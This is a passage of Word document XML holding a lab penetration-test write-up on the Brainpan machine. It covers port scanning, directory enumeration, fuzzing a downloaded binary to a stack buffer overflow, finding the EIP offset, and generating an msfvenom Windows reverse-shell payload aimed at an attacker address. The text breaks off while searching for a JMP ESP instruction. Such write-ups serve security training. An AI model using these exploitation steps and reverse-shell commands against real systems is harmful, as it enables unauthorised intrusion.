          <w:p w14:paraId="70FCE98E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.0.138</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE992" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE990" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE991" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Brainpan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE995" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE993" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE994" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>04-05-2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE998" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE996" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Point Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE997" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70FCE999" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="exploitation-overview"/>
      <w:r>
        <w:t>Exploitation Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="70FCE99A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To exploit Brainpan, a buffer overflow exploit was developed based on a binary that was disclosed via the web server. Once we successfully developed an exploit for the program on our test server, we succesfully use it to gain a shell on the target system. We break out of the virtual Windows environment and exploit a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary to gain command execution as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE99B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="service-enumeration"/>
      <w:r>
        <w:t>Service Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="70FCE99C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="portscan---tcp"/>
      <w:r>
        <w:t>Portscan - TCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="70FCE99D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PORT      STATE SERVICE REASON  VERSION                                                                             </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">9999/tcp  open  abyss?  syn-ack                                                                                     </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| fingerprint-strings:                                                                                              </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   NULL: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|     _| _| </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|     _|_| _| _| _| _| _| _| _| _| _| _| _|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|     [________________________ WELCOME TO BRAINPAN _________________________]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_    ENTER THE PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>10000/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 2.7.3)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-server-header: SimpleHTTP/0.6 Python/2.7.3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-title: Site doesn't have a title (text/html).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>1 service unrecognized despite returning data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE99E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="network-interfaces"/>
      <w:r>
        <w:t>Network interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="70FCE99F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 16436 qdisc noqueue state UNKNOWN </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet 127.0.0.1/8 scope host lo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet6 ::1/128 scope host </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       valid_lft forever preferred_lft forever</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    link/ether 00:0c:29:da:50:81 brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    inet 10.0.0.138/24 brd 10.0.0.255 scope global eth0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    inet6 fe80::20c:29ff:feda:5081/64 scope link </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       valid_lft forever preferred_lft forever</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>3: eth1: &lt;BROADCAST,MULTICAST&gt; mtu 1500 qdisc noop state DOWN qlen 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    link/ether 00:0c:29:da:50:8b brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9A0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="credentials"/>
      <w:r>
        <w:t>Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="70FCE9A1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9A2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="exploitation-and-proof"/>
      <w:r>
        <w:t>Exploitation and proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="70FCE9A3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="initial-access"/>
      <w:r>
        <w:t>Initial access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="70FCE9A4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="vulnerability-exploitation"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="70FCE9A5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap finds two non-default services. Port 9999 seems to be running a terminal application, but we need a password to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9A6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># nc 10.0.0.138 9999</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_|                            _|                                        </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            _|                          </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            _|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>[________________________ WELCOME TO BRAINPAN _________________________]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                          ENTER THE PASSWORD                              </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                          &gt;&gt; hello</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                          ACCESS DENIED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9A7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 10000 is identified as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and browsing to it it seems to return a banner image on safe coding practices. Enumerating subfolders the webserver with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, we find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which is listable and contains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>brainpan.exe</w:t>
      </w:r>
      <w:r>
        <w:t>. Let’s analyze this application!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9A8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/bin (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9A9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We load the binary to our windows VM and start fuzzing it. We find that if we send 1000 “A” characters as our password, the application hangs. Inspecting it in our debugging application (Unity debugger) we find that we have overwritten the stack, including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9AA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3" w:rsidP="00CB0044">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEABE" wp14:editId="1D862AAC">
            <wp:extent cx="2505075" cy="1224454"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture" descr="a7b7b9d025ee7b2331b0360b7f1a60eb.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/bd626d2837644bc5908d1a10c044bc61.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2523034" cy="1233232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9AB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>a7b7b9d025ee7b2331b0360b7f1a60eb.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9AC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>msf-pattern_create -l 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9AD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We then send that string as our password, and see that the EIP is overwritten with the value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>35724134</w:t>
      </w:r>
      <w:r>
        <w:t>. We can now identify the offset as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9AE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># msf-pattern_offset -l 1000 -q 35724134</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>[*] Exact match at offset 524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9AF" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This would imply that we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exactly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> overwrite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if we send 524 “A” characters and 4 “B” characters. Doing exactly that, we indeed manage to overwrite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with precision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3" w:rsidP="00CB0044">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAC0" wp14:editId="70FCEAC1">
            <wp:extent cx="2451100" cy="1384300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture" descr="3fccedb5d57ec60e0ed35b3f6b4cf1df.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/43674b8c9f7f41ea8785d605952406e6.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2451100" cy="1384300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>3fccedb5d57ec60e0ed35b3f6b4cf1df.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now, we send an array of the binary characters ranging from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>\x01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>\xff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in our buffer, to identify bad characters. Inspecting the characters in our buffer, none seem to have disappeared or caused issues in the buffer. As such, our only bad character is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:t>, which we already removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now to generate a payload. For our test system, we generate the following payload. Note that once we deploy it on the target, we need to replace this payload with one generated with a different </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.155 LPORT=443 EXITFUNC=thread -f py -b "\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This results in a big payload, which we include in our script. We prepend several </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (NOP) characters to ensure the payload is triggered correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, we have to find a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
